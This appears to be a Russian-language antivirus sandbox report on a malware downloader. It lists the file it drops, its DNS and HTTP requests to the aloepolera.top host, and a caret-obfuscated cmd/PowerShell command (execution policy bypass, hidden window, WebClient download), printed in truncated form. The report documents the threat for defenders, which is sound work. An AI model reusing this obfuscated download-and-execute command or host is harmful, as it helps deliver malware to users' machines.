Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "P^o^WeRShe^ll^.^E^x^e ^-^E^X^ECUtI^OnP^O^lIcy by^pAS^S^ -noPRO^F^Ile^ -W^InDoWSt^yl^E hId^d^eN (nEW^-oB^J^e^ct sYS^t^eM^.Net.^webC^LIENt^).^d^oW^Nl^o^a^DfILE^('http://...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'al###olera.top':80
TCP
Запросы HTTP GET
- http://al###olera.top/read.php?f=#####
UDP
- DNS ASK al###olera.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "P^o^WeRShe^ll^.^E^x^e ^-^E^X^ECUtI^OnP^O^lIcy by^pAS^S^ -noPRO^F^Ile^ -W^InDoWSt^yl^E hId^d^eN (nEW^-oB^J^e^ct sYS^t^eM^.Net.^webC^LIENt^).^d^oW^Nl^o^a^DfILE^('http://...' (со скрытым окном)
